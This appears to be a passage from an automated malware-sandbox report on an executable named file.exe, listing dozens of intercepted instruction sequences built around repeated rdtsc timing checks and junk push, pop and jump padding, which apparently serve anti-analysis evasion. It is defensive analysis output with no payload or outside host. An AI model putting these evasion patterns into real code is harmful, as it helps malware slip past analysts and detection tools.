              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7E7 second address: 108A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FAE58F8587Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7FF second address: 108A805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089CD6 second address: 1089CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A112 second address: 108A13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FAE58F8563Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAE58F85644h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A512 second address: 108A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A51C second address: 108A520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109318B second address: 10931C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jbe 00007FAE58F8587Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jmp 00007FAE58F85883h 0x0000001a jmp 00007FAE58F85885h 0x0000001f pop edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B39 second address: 1091B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B3F second address: 1091B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FAE58F8587Ah 0x0000000c pop edi 0x0000000d jmp 00007FAE58F8587Ah 0x00000012 pushad 0x00000013 jmp 00007FAE58F85880h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b popad 0x0000001c jnp 00007FAE58F85886h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B7A second address: 1091B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091DF6 second address: 1091DFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091DFC second address: 1091E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FAE58F85636h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F3B second address: 1091F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Eh 0x00000009 pushad 0x0000000a jp 00007FAE58F85876h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jmp 00007FAE58F85880h 0x0000001b pop edx 0x0000001c jo 00007FAE58F8588Bh 0x00000022 jmp 00007FAE58F8587Fh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F82 second address: 1091F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10920F3 second address: 1092113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jng 00007FAE58F85876h 0x00000016 jne 00007FAE58F85876h 0x0000001c pop eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092113 second address: 1092119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092574 second address: 1092578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092B4B second address: 1092B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092B51 second address: 1092B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099042 second address: 109904E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAE58F85636h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109904E second address: 1099054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099054 second address: 109905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109905A second address: 1099060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10995D9 second address: 10995DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099877 second address: 109987B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109987B second address: 109987F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109987F second address: 1099885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099885 second address: 109989D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAE58F85638h 0x00000008 push eax 0x00000009 jmp 00007FAE58F8563Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DCF second address: 1099DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DD5 second address: 1099DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FAE58F85641h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DF1 second address: 1099E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FAE58F85876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E06 second address: 1099E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E0A second address: 1099E14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E14 second address: 1099E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E19 second address: 1099E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAE58F85876h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E7CE second address: 109E7D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061388 second address: 106138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10614E7 second address: 10614EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10614EE second address: 1061500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F8587Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061500 second address: 1061540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FAE58F85638h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007FAE58F85643h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d push esi 0x0000002e pop esi 0x0000002f pop edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061C8F second address: 1061C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21D9 second address: 10A21DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21DD second address: 10A21E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAE58F85876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21E9 second address: 10A2205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F85647h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24B6 second address: 10A24CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007FAE58F8587Eh 0x0000000d jnc 00007FAE58F85876h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24CB second address: 10A24D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24D3 second address: 10A24D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24D7 second address: 10A2513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FAE58F85670h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007FAE58F8563Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAE58F85647h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2674 second address: 10A267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4A4F second address: 10A4A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A771E second address: 10A7722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB27 second address: 10ABB2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB2D second address: 10ABB39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB39 second address: 10ABB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB3F second address: 10ABB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85880h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAE58F8587Eh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF6B second address: 10ABF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF6F second address: 10ABF9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85882h 0x00000007 jmp 00007FAE58F85886h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF9F second address: 10ABFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABFA3 second address: 10ABFDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85888h 0x00000007 jg 00007FAE58F85876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007FAE58F85876h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jc 00007FAE58F85876h 0x00000025 push edx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC15C second address: 10AC160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8FE second address: 10AF902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF902 second address: 10AF908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA6E second address: 10AFA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10231B3 second address: 10231B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5853 second address: 10B5861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAE58F85876h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B48DC second address: 10B48F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAE58F85641h 0x0000000a jmp 00007FAE58F8563Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061A63 second address: 1061AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FAE58F85878h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 mov edi, ebx 0x00000029 movsx edx, di 0x0000002c nop 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAE58F85886h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A05 second address: 10B4A32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAE58F85646h 0x0000000f jmp 00007FAE58F8563Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A32 second address: 10B4A3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A3C second address: 10B4A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F85648h 0x00000008 jmp 00007FAE58F85646h 0x0000000d jne 00007FAE58F85636h 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB067 second address: 10BB06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB3AF second address: 10BB3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB3BA second address: 10BB3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAE58F85876h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB651 second address: 10BB65F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8563Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB65F second address: 10BB66B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAE58F85876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB66B second address: 10BB66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBBF2 second address: 10BBC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8587Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBEBD second address: 10BBEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA1B second address: 101AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FAE58F85882h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA34 second address: 101AA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA3E second address: 101AA54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8587Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA54 second address: 101AA58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C59C7 second address: 10C59CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4E97 second address: 10C4EA4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAE58F85636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4EA4 second address: 10C4EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5696 second address: 10C56A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C56A4 second address: 10C56C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAE58F85876h 0x0000000a jmp 00007FAE58F85882h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1C5 second address: 10CD1D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1D1 second address: 10CD1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1D5 second address: 10CD1FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8563Bh 0x00000007 jmp 00007FAE58F85642h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1FA second address: 10CD20B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FAE58F85876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD765 second address: 10CD77F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85645h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD77F second address: 10CD79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAE58F8587Ch 0x0000000f jnp 00007FAE58F85876h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD79B second address: 10CD7BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAE58F85646h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD91A second address: 10CD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
